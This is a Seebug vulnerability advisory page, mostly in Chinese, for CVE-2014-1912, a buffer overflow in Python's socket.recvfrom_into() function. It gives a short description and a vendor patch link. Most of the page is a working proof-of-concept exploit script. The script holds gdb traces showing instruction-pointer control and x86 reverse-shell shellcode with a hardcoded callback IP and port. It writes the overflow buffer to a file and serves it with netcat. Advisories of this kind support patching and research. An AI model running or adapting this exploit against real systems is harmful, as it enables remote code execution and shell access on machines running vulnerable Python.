Lucene search

RootSSV:61560

HistoryFeb 25, 2014 - 12:00 a.m.

Python "sock_recvfrom_into()" 缓冲区溢出漏洞

2014-02-2500:00:00

Root

www.seebug.org

0.53 Medium

EPSS

Percentile

97.6%

JSON

CVE(CAN) ID: CVE-2014-1912

Python是一种面向对象、直译式计算机程序设计语言。

Python 2.7版本的"sock_recvfrom_into()"函数(Modules/socketmodule.c)存在边界错误，利用后可造成缓冲区溢出，执行任意代码。
0
Python python 2.7.x
厂商补丁：

Python

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://bugs.python.org/issue20246


                                                #!/usr/bin/env python
 
'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912
 
 
 
socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder
 
TODO: rop to evade stack nx 
 
 
(gdb) x/i $eip
=&gt; 0x817bb28:    mov    eax,DWORD PTR [ebx+0x4]       &lt;--- ebx full control =&gt; eax full conrol
   0x817bb2b:   test   BYTE PTR [eax+0x55],0x40
   0x817bb2f:   jne    0x817bb38 --&gt;
   ...
   0x817bb38:   mov    eax,DWORD PTR [eax+0xa4]      &lt;--- eax full control again
   0x817bb3e:   test   eax,eax
   0x817bb40:   jne    0x817bb58 --&gt;
   ...
   0x817bb58:   mov    DWORD PTR [esp],ebx
   0x817bb5b:   call   eax &lt;--------------------- indirect fucktion call ;)
 
 
$ ./pyrecvfrominto.py 
    egg file generated
 
$ cat egg | nc -l 8080 -vv
 
... when client connects ... or wen we send the evil buffer to the server ...
 
0x0838591c in ?? ()
1: x/5i $eip
=&gt; 0x838591c:    int3                &lt;--------- LANDED!!!!!
   0x838591d:   xor    eax,eax
   0x838591f:   xor    ebx,ebx
   0x8385921:   xor    ecx,ecx
   0x8385923:   xor    edx,edx
 
'''
 
import struct
 
def off(o):
    return struct.pack('L',o)
 
 
reverseIP = '\xc0\xa8\x04\x34'   #'\xc0\xa8\x01\x0a'
reversePort = '\x7a\x69'
 
 
#shellcode from exploit-db.com, (remove the sigtrap)
shellcode = &quot;\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2&quot;\
            &quot;\xb0\x66\xb3\x01\x51\x6a\x06\x6a&quot;\
            &quot;\x01\x6a\x02\x89\xe1\xcd\x80\x89&quot;\
            &quot;\xc6\xb0\x66\x31\xdb\xb3\x02\x68&quot;+\
            reverseIP+&quot;\x66\x68&quot;+reversePort+&quot;\x66\x53\xfe&quot;\
            &quot;\xc3\x89\xe1\x6a\x10\x51\x56\x89&quot;\
            &quot;\xe1\xcd\x80\x31\xc9\xb1\x03\xfe&quot;\
            &quot;\xc9\xb0\x3f\xcd\x80\x75\xf8\x31&quot;\
            &quot;\xc0\x52\x68\x6e\x2f\x73\x68\x68&quot;\
            &quot;\x2f\x2f\x62\x69\x89\xe3\x52\x53&quot;\
            &quot;\x89\xe1\x52\x89\xe2\xb0\x0b\xcd&quot;\
            &quot;\x80&quot;
 
 
shellcode_sz = len(shellcode)
 
print 'shellcode sz %d' % shellcode_sz
 
 
ebx =  0x08385908
sc_off = 0x08385908+20
 
padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'
 
'''           
        +------------+----------------------+         +--------------------+
        |            |                      |         |                    |
        V            |                      |         V                    |
'''
buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off)  # .. and landed ;)
 
 
print 'buff sz: %s' % len(buff)
open('egg','w').write(buff)